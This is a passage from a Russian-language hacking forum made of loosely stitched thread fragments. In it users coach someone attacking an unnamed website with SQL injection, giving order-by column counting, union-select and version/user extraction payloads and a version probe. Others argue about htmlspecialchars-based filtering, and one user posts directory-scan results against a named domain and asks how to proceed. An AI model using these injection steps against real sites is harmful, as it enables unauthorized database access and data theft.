12.11.2009, 21:27
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от fng
Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...
Можно ли что-то сделать с этими параметрами?
Как ты пытаешься провести инъект, если ты даже не знаешь что он тебе отвечает?
order by 10000 --
order by 1 --
order by 4 --
union select 1,2,3,4 --
выводит 2,4 например
union select 1,concat_ws(0x3a,version(),user()),3,4 --
|
|
|
12.11.2009, 21:37
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от [x60]unu
Ну как бэ от ордер бай не всегда польза есть, часто приходится в ручную все гонять  ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
+and+substring(version(),1,1)=4
|
|
|
|
12.11.2009, 21:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
fng:
может и можно, а может и нельзя - ссылку в студию, попробуй перечитай свой вопрос и осознай, что разговариваешь с Землянами, а не с гуманоидными существами из галактики бетта, которые в совершенстве познали телепатию
|
|
|
|
12.11.2009, 21:25
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2Pashkela, могут конечно быть дефекты, но все зависит от того что и где ты фильтруешь.
P.S.: к стати, замечал на какой то из версий воблы используеться эта ф-я в ббкодах, действительно были дефекты. Но данная функция далеко не единственный способ защиты  |
|
|
|
12.11.2009, 21:25
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами:
9010027
Репутация:
308
|
|
Сообщение от Ins3t
Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.
Обсуждалось уже, htmlspecialchars() тоже обходиться.
|
|
|
|
12.11.2009, 21:26
|
|
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
С нами:
8777275
Репутация:
3
|
|
Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о
|
|
|
|
12.11.2009, 21:27
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
show must go on
|
|
|
|
12.11.2009, 21:28
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.
Последний раз редактировалось Ins3t; 12.11.2009 в 21:31..
|
|
|
|
12.11.2009, 21:31
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от Ins3t
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter
|
|
|
|
12.11.2009, 21:29
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Сообщение от Krist_ALL
http://security-digger.org/
или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392
ну вот просканировал я директори, получилось вот что:
Found [403]: mtl-consultants.com/.htaccess
Found [403]:site.com/.htaccess~
Found [403]: site.com/.htpasswd
Found [403]: site.com/.htpasswd~
Found [200]: .com/_notes/
Found [403]: .com/cgi-bin/
Found [403]: .com/cgi-sys/
Found [301]: .com/cpanel/
Found [200]: .com/email/
Found [301]: .com/images
Found [403]: .com/mailman
Found [301]: .com/pipermail
Found [301]: .com/webmail
Found [403]: .com/~root
а что дальше? объясни плиз
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [underwater]](/avatars/avatar81148.jpg?1683547){kind=avatar}
Похожие темы
Комбинированный вид
